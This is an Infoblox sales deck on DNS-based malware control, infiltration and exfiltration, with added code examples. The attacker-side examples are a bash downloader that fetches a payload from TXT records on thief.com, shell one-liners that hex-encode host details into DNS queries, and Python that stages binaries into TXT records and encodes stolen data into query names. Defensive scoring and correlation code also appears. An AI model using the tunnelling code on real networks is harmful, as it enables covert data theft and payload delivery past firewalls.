
New Security Challenge: The DNS Highway and Network Context on a Hybrid Architecture


© 2016 Infoblox Inc. All Rights Reserved.
Joaquín Gómez – Territory Sales Manager – IBERIA
Today's Security Landscape

400+ VENDORS

Security is Disconnected

[Figure: "Security You Want" vs. "Security You Often Get"]

Incident Response Challenges

• Which user or device owns IP address X?
• What are the previous IP addresses that device owned?
• Where is the device currently located?
• What internal resources has it been accessing?
• Has this device recently exhibited signs of compromise (malware C2 or data exfiltration)?

Operational Challenges

Network and Security – Separate Teams with Different Priorities

NETWORK TEAM: High Availability; Network Infrastructure (routers, APs, switches, etc.); Network Logging and Monitoring
SECURITY TEAM: Risk Mitigation; Security Infrastructure (firewalls, endpoints, sandboxing, etc.); Security Logging and Monitoring (SIEM)

The Problems this Causes:
• Wastes resources for security and audit/compliance
• Makes the IHR (incident handling and response) process more difficult
• Extends time to remediation of incidents

Gartner's View on Silos

"Silos between network, edge, endpoint and data security systems and processes can restrict an organization's ability to prevent, detect and respond to advanced attacks."
Gartner, "Best Practices for Detecting and Mitigating Advanced Threats, 2016 Update", 29 March 2016

DNS: The Malware Control Plane

DNS - Leading Culprit for Data Exfiltration
One Byte is Too Much

$3.8M: average consolidated cost of a data breach (1)
46%: share of survey respondents that experienced DNS data exfiltration (2)
45%: share of survey respondents that experienced DNS tunneling (2)

• DNS tunnels are commonly used to send sensitive information out
• Data can also be exfiltrated by embedding it directly in DNS queries

1. Source: Ponemon Institute, 2015 Cost of Data Breach Study
2. Source: SC Magazine, Dec 2014, "DNS attacks putting organizations at risk, survey finds"

APT/Malware Proliferation Rooted in DNS
Easy to Let In, Tough to Get Out

91%: of malware uses DNS to carry out campaigns (1)
431M: new unique pieces of malware in 2015 (2)
#1: malware C&C is the #1 responsible vector for crimeware (3)

• Intruders rely on DNS to infect devices, propagate malware and exfiltrate data
• Malware is designed to spread, morph and hide within your IT infrastructure
• The longer it takes to discover, the higher the cost of the damage

1. Source: Cisco 2016 Annual Security Report  2. Symantec 2016 Internet Security Threat Report  3. Verizon 2016 Data Breach Investigations Report

DNS is a top attack vector
DNS is vulnerable to attacks and exploitation

[Figure: two pie charts, values as printed on the slide, grouped so that each chart sums to 100%]
Exfiltration by protocol: DNS 45%, HTTP 40%, FTP 8%, Other 7%
DoS attacks by protocol: DNS 76%, NTP 11%, HTTP 9%, Other 4%
*Cloudmark 2014 report
Malware Exploiting DNS
• Over 91% of malware uses DNS:
  – to gain command and control
  – to exfiltrate data
  – to redirect traffic
• Despite adversaries' reliance on DNS, 68% of organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and impact organizations of all sizes and types
• Average total cost of a data breach: ~$3.8M USD
• The question isn't if, but when you will be attacked, and how effectively you can respond

Source: Cisco 2016 Annual Security Report

Exfiltrating Data via DNS Tunneling
• Uses DNS as a covert communication channel to bypass firewalls
• The attacker tunnels other protocols, like SSH or web, within DNS
• Enables attackers to easily insert malware, pass stolen data or tunnel IP traffic without detection
• A DNS tunnel can be used as a full remote-control channel for a compromised internal host
• Examples:
  – Iodine
  – OzymanDNS
  – SplitBrain
  – DNS2TCP

[Figure: a compromised internal host runs a client-side tunnel program (Iodine); its IP traffic is encoded into DNS queries, which the enterprise DNS server forwards to the attacker's Iodine server on the Internet, where they are decoded back into IP traffic. The resulting channel is slow ("slow DNS").]

Data Exfiltration over DNS

[Figure: a compromised endpoint splits the stolen data into chunks and sends each chunk as a query name under thief.com; the rogue DNS server strips the domain, reassembles the chunks, and the data is listed on the darknet and sold for Bitcoin. The queries as seen in the DNS server's syslog:]
+12f(2354ayqv1asdf7s6ex.thief.com
Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
nkjFYVW$%&(YBH$JKGHkjh.thief.com

Reassembled on the rogue DNS server:
+12f(2354ayqv1asdf7s6ex
Xc786asdf89xcbv897sadfjlw
fityhkjDR65eUGYbjkUY6756
nkjFYVW$%&(YBH$JKGHkjh

(The slide's sample labels contain characters such as "$%&(" that a hostname cannot carry; real tunnels encode chunks in hex, base32 or base64 so that every label is made of letters, digits and hyphens.)

Malware Infiltration over DNS

[Figure: the attacker loads the encoded binary into TXT records on a rogue DNS server via DDNS update; the compromised host queries for the TXT records, reassembles the binary, and the same channel then serves as command and control.]

Binary code is encoded and loaded into TXT records. The record on the slide is the base64 encoding of an ELF binary ("f0VMRg" decodes to the 0x7f "ELF" magic):
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAAABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIAEAAJQAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"

DNS Infiltration = Malware code acquisition

Downloader script. Its single argument ($1) is the attacker's domain; the payload has been published base64-encoded in the TXT records 0.$1, 1.$1, 2.$1, ... and the script reads them in order:

    #!/bin/bash
    # the string dig prints when the server cannot be reached
    error=';; connection timed out; no servers could be reached'
    i=0
    echo '' > output.b64
    while :
    do
       # one TXT record per chunk; cut keeps only the first quoted string
       RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2`
       # stop on a timeout, and also when the name does not exist: dig +short
       # prints nothing on NXDOMAIN, which would otherwise loop forever
       if [ "$RESP" = "$error" ] || [ -z "$RESP" ];
       then
          echo "Timeout - done"
          break
       fi
       echo -ne $RESP >> output.b64
       echo $RESP
       i=$((i+1))
    done
    cat output.b64 | base64 -d > output

The same script, hex-encoded and split into 4 TXT records, which is how it was staged on the rogue server:
1. 23212f62696e2f62617368206572726f723d5c273b3b20636f6e6e656374696f6e2074696d6564206f75743b206e6f207365727665727320636f756c6420626520726561636865645c2720693d30206563686f205c275c273e206f75747075742e6236
2. 34207768696c65203a20646f202020524553503d60646967202b73686f72742024692e243120545854207c20637574202d645c275c225c27202d662032602020206966205b205c2224524553505c22203d205c22246572726f725c22205d3b202020
3. 7468656e20202020206563686f205c2254696d656f7574202d20646f6e655c222020202020627265616b20202066692020206563686f202d6e65202452455350203e3e206f75747075742e6236342020206563686f202452455350202020693d2428
4. 28692b31292920646f6e6520636174206f75747075742e623634207c20626173653634202d64203e206f7574707574
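The staging side of this exchange, as an added example that is not part of the original deck and not Infoblox tooling: `stage_payload` base64-encodes a binary into numbered TXT records the way the slide describes, respecting the 255-octet limit of a single TXT string; `fetch_payload` reassembles them exactly as the dig loop does (reading 0, 1, 2, ... until an index is missing); and `decode_hex_records` turns the four hex records above back into the script. The zone name thief.com and the 60-second TTL are assumptions.

```python
import base64

TXT_MAX = 255   # RFC 1035: one TXT <character-string> is at most 255 octets

# The four hex-encoded TXT records printed on the slide (the downloader script itself),
# copied line by line and joined.
SLIDE_HEX_RECORDS = [
    "23212f62696e2f62617368206572726f723d5c273b"
    "3b20636f6e6e656374696f6e2074696d6564206f75"
    "743b206e6f207365727665727320636f756c64206"
    "26520726561636865645c2720693d30206563686f"
    "205c275c273e206f75747075742e6236",
    "34207768696c65203a20646f202020524553503d6"
    "0646967202b73686f72742024692e243120545854"
    "207c20637574202d645c275c225c27202d662032"
    "602020206966205b205c2224524553505c22203d"
    "205c22246572726f725c22205d3b202020",
    "7468656e20202020206563686f205c2254696d656"
    "f7574202d20646f6e655c22202020202062726561"
    "6b20202066692020206563686f202d6e652024524"
    "55350203e3e206f75747075742e62363420202065"
    "63686f202452455350202020693d2428",
    "28692b31292920646f6e6520636174206f7574707"
    "5742e623634207c20626173653634202d64203e2"
    "06f7574707574",
]


def decode_hex_records(records):
    """The records are consecutive slices of one hex string: join, un-hex, decode."""
    return bytes.fromhex("".join(records)).decode()


def stage_payload(blob: bytes, zone: str, ttl: int = 60):
    """Attacker side: base64 the binary and publish it as numbered TXT records
    0.<zone>, 1.<zone>, ... as zone-file lines. One string per record, because the
    slide's downloader keeps only the first quoted string of dig's output."""
    b64 = base64.b64encode(blob).decode()
    return [
        f'{i}.{zone}. {ttl} IN TXT "{b64[j:j + TXT_MAX]}"'
        for i, j in enumerate(range(0, len(b64), TXT_MAX))
    ]


def txt_records(zone_lines):
    """Stand-in for the rogue authoritative server: record index -> TXT string."""
    records = {}
    for line in zone_lines:
        name, _ttl, _cls, _rtype, quoted = line.split(" ", 4)
        records[int(name.split(".", 1)[0])] = quoted.strip('"')
    return records


def fetch_payload(records):
    """Client side, equivalent to the dig loop: read 0, 1, 2, ... until a name is
    missing (the script stops on a timeout or an empty answer), then base64-decode."""
    parts, i = [], 0
    while i in records:
        parts.append(records[i])
        i += 1
    return base64.b64decode("".join(parts))


if __name__ == "__main__":
    print(decode_hex_records(SLIDE_HEX_RECORDS))
    for line in stage_payload(b"\x7fELF" + bytes(300), "thief.com"):
        print(line)
```

Because every chunk has its own name, a resolver never serves the whole binary from cache; the sequential names (0, 1, 2, ... under one domain, each answered with a 255-character TXT string) are exactly the pattern a resolver log can be searched for.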

DNS Exfiltration = Command and Control
Signaling and Control responses with DNS

The collected value travels out in the hex-encoded label; the address returned to the client carries the attacker's response back.

Hostname:
  hostname | xxd -p
  Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
  PTR -> 1.2.3.4

IPv4 address:
  ipconfig getifaddr en0 | xxd -p
  Query A -> 3137322e32302e31302e320a.thief.com
  PTR -> 1.2.3.4

Gateway:
  route -n get default | grep gateway | cut -d: -f 2 | sed 's/^[ \t]*//;s/[ \t]*$//' | xxd -p
  Query A -> 3137322e32302e31302e310a.thief.com
  PTR -> 1.2.3.4
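An encoder/decoder pair covering both of the preceding slides (the chunked labels under thief.com and the hex-encoded beacons shown here), added as an illustration and not taken from the deck or from any of the tunnelling tools it lists. It enforces the two DNS limits a working tunnel has to respect (63-octet labels, 253-character names), uses base32 for bulk data (an assumption: the slides show hex, but base64 would be corrupted by resolvers that fold case) and reassembles out-of-order chunks on the receiving side. The `<seq>.<session>` label layout is my own.

```python
from __future__ import annotations
import base64

MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # longest presentation-format name that fits the 255-octet wire limit


def hex_beacon(value: str, domain: str) -> str:
    """Single-value beacon exactly as on the slide (`hostname | xxd -p`).
    Hex uses only [0-9a-f] and is case-insensitive, so it survives any resolver,
    but it doubles the size of the data."""
    return f"{value.encode().hex()}.{domain}"


def decode_hex_beacon(qname: str, domain: str) -> str:
    """Rogue-server side of hex_beacon: strip the domain, un-hex the label."""
    label = qname[: -(len(domain) + 1)]
    return bytes.fromhex(label).decode()


def encode_payload(data: bytes, domain: str, session: str = "s1") -> list[str]:
    """Chunk arbitrary bytes into query names <seq>.<session>.<label>...<label>.<domain>.
    base32 is an assumption (the slides show hex): denser than hex and, unlike base64,
    unaffected by resolvers that fold case. The <seq> label makes every name unique,
    so caching resolvers forward each query to the attacker's authoritative server."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    names: list[str] = []
    seq = i = 0
    while i < len(labels):
        head = f"{seq}.{session}"
        body: list[str] = []
        # keep adding payload labels while the whole name still fits in MAX_NAME
        while i < len(labels) and (
            len(head) + sum(len(l) + 1 for l in body) + len(labels[i]) + 2 + len(domain) <= MAX_NAME
        ):
            body.append(labels[i])
            i += 1
        if not body:
            raise ValueError("domain too long to carry a payload label")
        names.append(".".join([head, *body, domain]))
        seq += 1
    return names


def decode_payload(names: list[str], domain: str) -> dict[str, bytes]:
    """Rogue-server side: queries may arrive out of order or through several resolvers,
    so chunks are keyed by session and ordered by seq before decoding."""
    chunks: dict[str, dict[int, str]] = {}
    for name in names:
        if not name.lower().endswith("." + domain):
            continue                      # unrelated query, e.g. from a scanner
        parts = name.lower()[: -(len(domain) + 1)].split(".")
        seq, session, body = int(parts[0]), parts[1], parts[2:]
        chunks.setdefault(session, {})[seq] = "".join(body)
    out = {}
    for session, by_seq in chunks.items():
        b32 = "".join(by_seq[k] for k in sorted(by_seq)).upper()
        b32 += "=" * (-len(b32) % 8)     # restore the padding stripped on the way out
        out[session] = base64.b32decode(b32)
    return out


if __name__ == "__main__":
    for q in encode_payload(b"secret document contents " * 20, "thief.com"):
        print(q)
```

Run it and note what a resolver log would show: a burst of long, high-entropy names, each unique, all under one second-level domain. That is the signature the detection slides later in the deck score on.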

Security in Layers, What About DNS or GDPR?
Is DNS Covered? YES, with Infoblox

[Figure: the existing layers: Firewall/NGFW, IPS/IDS, Web Proxy, Email/SPAM, APT/Sandbox, and your SIEM solution for centralized logging and reporting; the application offerings in use: Salesforce.com, Office 365, Workday (HR), SAP; business IP/data; DHCP.]

DNS communicates over port 53 and is NOT inspected by these tools: they pass it through rather than look inside it.

Infoblox DNS:
• Secure DNS at the source
• Reporting
• Proactively block malware and understand who's infected
• Prevent IP leaving your DC

Motion of Malware through Networks: "PIE"
APT/malware uses DNS at every stage

P, Penetration: query malicious domains and report to C&C
I, Infection: download malware to the infected host
E, Exfiltration: transport the data offsite

[Figure: the DNS server sits in the path of all three stages]

Breaking the Security Gap: a Control Plane for Context, Visibility and Preventing Data Exfiltration
Infoblox Advanced DNS Protection - ADP
WHERE IT FITS
The solution components of Advanced DNS
Protection include:
• Software ADP:
For organizations with lower capacity
requirements with a lower entry price point.
• Infoblox Appliances:
Trinzic hardware and virtual appliances consist of Trinzic TE-1410/1420/815/825/1415 appliances with the software ADP subscription add-on. Virtual appliances are supported on VMware and KVM.
• Advanced DNS Protection Service:
The software plus Threat Adapt technology
provides ongoing protection against existing and
evolving threats to the DNS server.
• Reporting and Analytics:
Deep visibility and rich network context around
attack patterns and sources.

ActiveTrust Service®

[Figure: the ActiveTrust components: Infoblox DNS Firewall; Infoblox Threat Insight (cloud / on-prem); Infoblox Threat Intelligence Data Exchange (TIDE); Infoblox Dossier]

ActiveTrust - Threat Intelligence (Actionable!)
• "Feeds" only block access
  – The cause of the problem is still there!
  – They still require analysts to identify the device
  – They still require analysts to find and clean the device
• Local intelligence (context) allows you to start automating the analysis and mitigation
  – It now becomes "Actionable Intelligence"
• Finally, there are many feeds
  – Each specializes in something
  – There is very little overlap
  – As customers' security capability matures, they use more and more of them

[Figure: ActiveTrust TIDE takes in feeds (phishing, botnets, SPAM IPs, URLs, rated by size, scope and severity): the Infoblox Threat Intelligence Feed (Base, Malware, Ransomware), user-defined feeds and other vendors' feeds. It distributes them to NAC, DLP, WAF, IPS, NGFW and FW. The Infoblox DDI platform adds the local context: device IP address, device MAC address, device type, device host name, device lease history, logged-in user, device localization, device metadata and RPZ behaviors.]
Infoblox TIDE – External Threat Feeds

Solution Overview
Infoblox supplements ActiveTrust threat data with threat data from third-party sources by allowing that data to be managed from within Infoblox TIDE.

Benefits
1. Eliminate the cost of onboarding additional third-party data
2. Maximize resources by giving time back to the security operations and threat intelligence team

Infoblox TIDE/Dossier IOC lookups
ActiveTrust® - Threat Intelligence Providers

Solution overview:
The Infoblox TIDE solution allows customers to send TIDE and Dossier lookup requests (IOC lookups from the SIEM and other security devices, exchanged as XML, JSON, STIX or CSV), enabling customers to break the silos between security tools and facilitating effective protection for both the network and endpoint domains.

Benefits:
1. Visibility across both network and endpoint domains
2. Remediation and policy actions enabling faster response to threats


Leveraging Threat Intel Across the Entire Security Infrastructure

[Figure: sources (Infoblox C&C IP list; SURBL phishing &amp; malware URLs; marketplace spambot IPs; custom TI with C&C &amp; malware hosts/domains, in various file formats) feed TIDE, which defines data policy, governance and translation, and distributes to NGFW, SIEM, etc.; Dossier is used to investigate threats.]

• Threat intel automatically aggregated from internal and external sources
• Flexible data distribution to NGFW, SIEM, etc.

RESULT: a single source of TI management, faster triage, threat prioritization
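An aggregator in the spirit of this slide and the "Actionable!" slide before it (feeds in different formats normalised into one table, the overlap between feeds measured, the result distributed per consumer), added here as an example and not Infoblox's TIDE implementation. The three feeds, their formats, the type vocabulary and the consumer functions are constructed assumptions; the one non-obvious step it shows is folding a host into a listed parent domain so the DNS firewall gets one rule instead of several.

```python
import csv
import json

# Three constructed feeds in the formats the slide lists (not real Infoblox or vendor files).
FEED_CSV = """\
# Infoblox-style CSV export (constructed)
indicator,type,class,property
Thief.com.,host,MalwareC2,MalwareC2_Generic
198.51.100.7,ip,Spambot,Spambot_Generic
bad-cdn.example,host,Phishing,Phishing_Generic
"""
FEED_JSON = json.dumps([
    {"value": "thief.com", "type": "domain", "confidence": 90},
    {"value": "c2.thief.com", "type": "domain", "confidence": 80},
    {"value": "203.0.113.9", "type": "ipv4", "confidence": 70},
])
FEED_TXT = """\
; hosts-style blocklist (constructed)
0.0.0.0 bad-cdn.example
0.0.0.0 phish.example.net
"""
FEEDS = {"infoblox": ("csv", FEED_CSV), "vendor": ("json", FEED_JSON), "oss": ("hosts", FEED_TXT)}

# each feed has its own type vocabulary; map it onto two kinds
KIND = {"host": "host", "domain": "host", "hostname": "host", "ip": "ip", "ipv4": "ip", "ipv6": "ip"}


def parse_feed(fmt, text):
    """Yield (indicator, type) pairs from one feed; one reader per format."""
    if fmt == "json":
        for item in json.loads(text):
            yield item["value"], item["type"]
    elif fmt == "csv":
        rows = [l for l in text.splitlines() if l and not l.startswith("#")]
        for row in csv.DictReader(rows):
            yield row["indicator"], row["type"]
    elif fmt == "hosts":
        for line in text.splitlines():
            if line and not line.startswith((";", "#")):
                yield line.split()[-1], "host"
    else:
        raise ValueError(f"unknown feed format {fmt}")


def aggregate(feeds):
    """One table: indicator -> kind, the sources that list it and, for hosts, the
    listed parent domain that already covers it."""
    merged = {}
    for name, (fmt, text) in feeds.items():
        for raw, kind in parse_feed(fmt, text):
            ind = raw.strip().lower().rstrip(".")          # normalise case and trailing dot
            entry = merged.setdefault(ind, {"kind": KIND[kind.lower()], "sources": set(), "covered_by": None})
            entry["sources"].add(name)
    hosts = {i for i, e in merged.items() if e["kind"] == "host"}
    for h in hosts:
        parts = h.split(".")
        for i in range(1, len(parts) - 1):
            parent = ".".join(parts[i:])
            if parent in hosts:
                merged[h]["covered_by"] = parent      # a rule on the parent already blocks it
                break
    return merged


def overlap(merged, a, b):
    """Indicators two feeds share (the 'very little overlap' claim, measured)."""
    return sum(1 for e in merged.values() if {a, b} <= e["sources"])


def for_dns_firewall(merged):
    """Host indicators not covered by a listed parent, for an RPZ / DNS firewall."""
    return sorted(i for i, e in merged.items() if e["kind"] == "host" and e["covered_by"] is None)


def for_firewall(merged):
    """IP indicators for a network firewall / NGFW block list."""
    return sorted(i for i, e in merged.items() if e["kind"] == "ip")


def prioritised(merged):
    """Indicators ordered by how many independent sources agree on them."""
    return sorted(merged, key=lambda i: (-len(merged[i]["sources"]), i))


if __name__ == "__main__":
    table = aggregate(FEEDS)
    print("DNS firewall:", for_dns_firewall(table))
    print("Firewall:", for_firewall(table))
    print("overlap infoblox/vendor:", overlap(table, "infoblox", "vendor"))
```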

How Streaming DNS Threat Insight Works
Detects sophisticated data exfiltration techniques that don't have well-known signatures (zero day)
1. Looks at TXT, A and AAAA records
2. Detects the presence of data using lexical and temporal analysis
3. Certain attributes add to a threat score, others subtract from it
4. The final score classifies a request as exfiltration or not
5. If exfiltration is found, automatically adds the destinations to a special internal RPZ feed
6. Scales protection to other parts of the network

[Figure: model inputs: entropy, size, lexical analysis, frequency, n-gram]
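A scaled-down version of the scoring in steps 1 to 5, added as an example and not Infoblox's model: each query name is scored on entropy, size, digit density and consonant runs (a crude stand-in for n-gram analysis), familiar service labels subtract, a per-client frequency term is added, and every domain over the threshold is emitted as RPZ records. The log format, the weights, the threshold and the "last two labels" rule for the registered domain are all assumptions, and the sample log is constructed; its thief.com names are in the shape produced by the earlier exfiltration slides.

```python
import math
import re
from collections import defaultdict

# Constructed resolver query-log sample (format assumed: "time client qname qtype").
SAMPLE_LOG = """\
10:00:01 10.1.1.5 www.example.com A
10:00:02 10.1.1.5 mail.example.com MX
10:00:03 10.1.1.9 api.github.com A
10:00:04 10.1.1.9 cdn-a1.static.example.net A
10:00:05 10.1.1.5 0.s1.nfzwi3tvmrsw4zdfon2gs33omfxgm4y.thief.com A
10:00:05 10.1.1.5 1.s1.fityhkjdr65eugybjkuy6756qv1asdf7s6ex.thief.com A
10:00:06 10.1.1.5 2.s1.xc786asdf89xcbv897sadfjlw2354ayqv1a.thief.com A
10:00:06 10.1.1.5 3.s1.nkjfyvwybhjkghkjh6756fityhkjdr65e.thief.com TXT
10:00:07 10.1.1.5 4.s1.b3f9a1c07e22d4ff19ab3c8e0d5f6a71.thief.com AAAA
10:00:08 10.1.1.9 login.microsoftonline.com A
"""

ALLOWLIST = {"www", "mail", "api", "login", "smtp", "imap", "ns1", "ns2"}
FLAG_THRESHOLD = 5.0   # hypothetical weights and threshold, chosen for illustration


def shannon_entropy(s: str) -> float:
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def longest_consonant_run(s: str) -> int:
    return max((len(m) for m in re.findall(r"[b-df-hj-np-tv-z]+", s)), default=0)


def split_name(qname: str, base_labels: int = 2):
    """'a.b.example.com' -> ('a.b', 'example.com'). Assumption: the registered domain
    is the last two labels; production code uses the Public Suffix List instead."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-base_labels]), ".".join(labels[-base_labels:])


def score_query(qname: str):
    """Per-query score: attributes that look like data add, familiar ones subtract."""
    payload, base = split_name(qname)
    if not payload:
        return 0.0, base
    labels = payload.split(".")
    flat = payload.replace(".", "")
    score = 0.0
    if shannon_entropy(flat) >= 3.5:                       # entropy: random-looking characters
        score += 2
    if len(flat) > 40:                                     # size of the data-bearing part
        score += 2
    elif len(flat) > 20:
        score += 1
    if max(len(l) for l in labels) > 30:                   # size: one very long label
        score += 1
    if sum(c.isdigit() for c in flat) / len(flat) > 0.2:   # lexical: hex/base32 digit density
        score += 1
    if longest_consonant_run(flat) >= 5:                   # n-gram proxy: unpronounceable runs
        score += 1
    if labels[0] in ALLOWLIST:                             # attributes that subtract
        score -= 2
    return score, base


def analyse(log_text: str):
    """Combine the best per-query score of a base domain with a frequency term (many
    distinct names under that domain from one client inside the window)."""
    best = defaultdict(float)
    distinct = defaultdict(set)
    for line in log_text.splitlines():
        _ts, client, qname, _qtype = line.split()
        score, base = score_query(qname)
        best[base] = max(best[base], score)
        distinct[(client, base)].add(qname)
    flagged = set()
    for (client, base), names in distinct.items():
        frequency_bonus = 2 if len(names) >= 4 else 0
        if best[base] + frequency_bonus >= FLAG_THRESHOLD:
            flagged.add(base)
    return flagged


def rpz_records(domains):
    """Zone lines for the internal RPZ feed; 'CNAME .' makes the resolver answer NXDOMAIN."""
    lines = []
    for d in sorted(domains):
        lines += [f"{d} CNAME .", f"*.{d} CNAME ."]
    return lines


if __name__ == "__main__":
    print("\n".join(rpz_records(analyse(SAMPLE_LOG))))
```

The weights are the part that needs tuning on real traffic: CDN, anti-spam and telemetry domains legitimately carry long hashed labels, which is why the frequency term and the subtracting attributes matter as much as entropy.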
ActiveTrust Cloud

Challenge
• Customers need access to actionable threat intel IOCs for analytics and for their security ecosystem solutions.

Solution
• ActiveTrust TIDE allows customers to utilize Infoblox threat intel in all their security ecosystem solutions.

Benefits
• Improved security, valuable threat intel
• Better ROI on all their existing solutions
• Faster identification & better threat prevention

Easing Operational Challenges

What Infoblox can provide…
Supporting the ecosystem…

• Orchestration plug-ins and integration, e.g. SCO, vRA, ServiceNow, BMC, AWS, Azure, OpenStack
• Security integrations, e.g. Cisco ISE, Carbon Black, FireEye, Rapid7, STIX/TAXII
• APIs for integration and automation, e.g. RESTful API
• Reporting to monitor, manage & alert

[Figure: DNS, DHCP and IPAM at the centre of the ecosystem]

The DDI Data Gold Mine

DHCP: Device Audit Trail and Fingerprinting
A DHCP assignment signals the insertion of a device on to the network
• Includes context: device info, MAC, lease history
• DHCP is an audit trail of devices on the network
• Context for accurate risk assessment and event prioritization

IPAM: Application and Business Context
Fixed IP addresses are typically assigned to high-value devices:
• Data center servers, network devices, etc.
• IPAM provides "metadata" via Extended Attributes: owner, app, security level, location, ticket number

DNS: Activity Audit Trail
DNS query data provides a "client-centric" record of activity
• Includes internal activity inside the security perimeter
• Includes BYOD and IoT devices
• This provides an excellent basis to profile device & user activity

Infoblox NGDDI, Most Accurate Information
Authoritative Network Database

ONE SHOT (what is known right now):
What IP? -> DHCP service / discovery
When did it appear? -> allocate / discovery / cloud
Which MAC? -> DHCP or discovery
Device type? -> DHCP fingerprint
DNS hostname? -> DNS + DDNS updates
User behind it? -> AD user identity mapping
Where is it? -> Network Insight / cloud IPAM
Network context? -> risk, localization, attributes
Infected? Block? -> DNSFW / Insight + ecosystem

ONE SHOT (what has happened in the past: IP, user, hostname, RPZ, lease…; ecosystem activity; tracking history) -> Infoblox Reporting and Analytics
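Answering the incident-response questions posed earlier in the deck (which device owned IP X at time T, its previous addresses, where it sits, what it queried, whether any of that hit the RPZ feed) by correlating the three DDI sources described on the last two slides. This is an added example with constructed DHCP, DNS and IPAM data in assumed formats (ISC-dhcpd-style DHCPACK lines, BIND-style query-log lines, ISO 8601 timestamps), not Infoblox code. The point it makes is that a lease moves: the same IP belongs to two different devices two hours apart, so the lookup has to be time-bounded or the wrong user gets the ticket.

```python
import ipaddress
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed logs; timestamps are ISO 8601 so they compare directly.
DHCP_LOG = """\
2016-06-10T09:00:00 dhcpd: DHCPACK on 10.1.1.5 to aa:bb:cc:dd:ee:01 (alice-laptop) via eth1
2016-06-10T09:05:00 dhcpd: DHCPACK on 10.1.1.9 to aa:bb:cc:dd:ee:02 (bob-mbp) via eth1
2016-06-10T11:00:00 dhcpd: DHCPACK on 10.1.1.5 to aa:bb:cc:dd:ee:02 (bob-mbp) via eth1
2016-06-10T11:01:00 dhcpd: DHCPACK on 10.1.1.7 to aa:bb:cc:dd:ee:01 (alice-laptop) via eth1
"""
DNS_LOG = """\
2016-06-10T10:30:00 client 10.1.1.5#51234: query: 0.s1.nfzwi3tvmrsw4zdf.thief.com IN A + (10.1.1.2)
2016-06-10T10:30:01 client 10.1.1.5#51235: query: 1.s1.fityhkjdr65eugyb.thief.com IN A + (10.1.1.2)
2016-06-10T11:30:00 client 10.1.1.5#51300: query: www.example.com IN A + (10.1.1.2)
2016-06-10T11:31:00 client 10.1.1.9#51301: query: login.microsoftonline.com IN A + (10.1.1.2)
"""
RPZ_FEED = {"thief.com"}   # base domains on the internal RPZ feed (constructed)
IPAM_EA = {                # IPAM extended attributes per network (constructed)
    "10.1.1.0/24": {"location": "Madrid HQ, floor 3", "owner": "Workplace IT", "security_level": "user LAN"},
}
DHCP_RE = re.compile(r"^(\S+) dhcpd: DHCPACK on (\S+) to (\S+) \((\S+)\)")
DNS_RE = re.compile(r"^(\S+) client (\S+)#\d+: query: (\S+) IN (\S+)")


@dataclass
class Lease:
    ts: datetime
    ip: str
    mac: str
    host: str


def parse_dhcp(text):
    leases = []
    for line in text.splitlines():
        m = DHCP_RE.match(line)
        if m:
            leases.append(Lease(datetime.fromisoformat(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return sorted(leases, key=lambda l: l.ts)


def lease_at(leases, ip, when):
    """Who held `ip` at `when`: the most recent ACK for that IP at or before `when`.
    An IP-only mapping that ignores time blames the wrong device once the lease moves."""
    held = [l for l in leases if l.ip == ip and l.ts <= when]
    return max(held, key=lambda l: l.ts, default=None)


def lease_window(leases, lease):
    """A lease is in force until the next ACK hands the same IP to someone else."""
    later = [l.ts for l in leases if l.ip == lease.ip and l.ts > lease.ts]
    return lease.ts, min(later, default=datetime.max)


def ip_history(leases, mac):
    seen = []
    for l in leases:
        if l.mac == mac and l.ip not in seen:
            seen.append(l.ip)
    return seen


def base_domain(qname):
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])   # assumption: last two labels


def queries_in(text, ip, start, end):
    out = []
    for line in text.splitlines():
        m = DNS_RE.match(line)
        if m and m.group(2) == ip and start <= datetime.fromisoformat(m.group(1)) < end:
            out.append(m.group(3))
    return out


def investigate(ip, when_iso, dhcp_text=DHCP_LOG, dns_text=DNS_LOG, rpz=RPZ_FEED, ipam=IPAM_EA):
    """Answer the incident-response questions for one IP at one point in time."""
    when = datetime.fromisoformat(when_iso)
    leases = parse_dhcp(dhcp_text)
    lease = lease_at(leases, ip, when)
    if lease is None:
        return {"ip": ip, "mac": None}
    start, end = lease_window(leases, lease)
    queries = queries_in(dns_text, ip, start, end)        # only what THIS lease did
    hits = sorted({q for q in queries if base_domain(q) in rpz})
    addr = ipaddress.ip_address(ip)
    net = next((ea for cidr, ea in ipam.items() if addr in ipaddress.ip_network(cidr)), {})
    return {
        "ip": ip, "mac": lease.mac, "host": lease.host,
        "ip_history": ip_history(leases, lease.mac),
        "location": net.get("location"),
        "queries": queries, "rpz_hits": hits,
        "suspect_c2_or_exfil": bool(hits),
    }


if __name__ == "__main__":
    print(investigate("10.1.1.5", "2016-06-10T10:30:00"))
    print(investigate("10.1.1.5", "2016-06-10T11:30:00"))
```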
Infoblox as part of Cybersecurity Orchestration
Accelerating Incident Handling and Response with Automation

Context to Prioritize Remediation

DHCP: Device Audit Trail and Fingerprinting
• Device info, MAC, lease history

IPAM: Application and Business Context
• "Metadata" via Extended Attributes: owner, app, security level, location, ticket number
• Context for accurate risk assessment and event prioritization

DNS:
• Malicious activity inside the security perimeter
• Includes BYOD and IoT devices
• Profile device & user activity

How can Infoblox Help You Get There

Infoblox Actionable Network Intelligence Delivers Control and Security from the Core
Iberia SALES: Joaquín Gómez, jgomez@infoblox.com, +34 670 499 348
Pre-SALES: Jose Canelada, jcanelada@infoblox.com, +34 678 534 519

Q&A
Thank you very much
Questions?
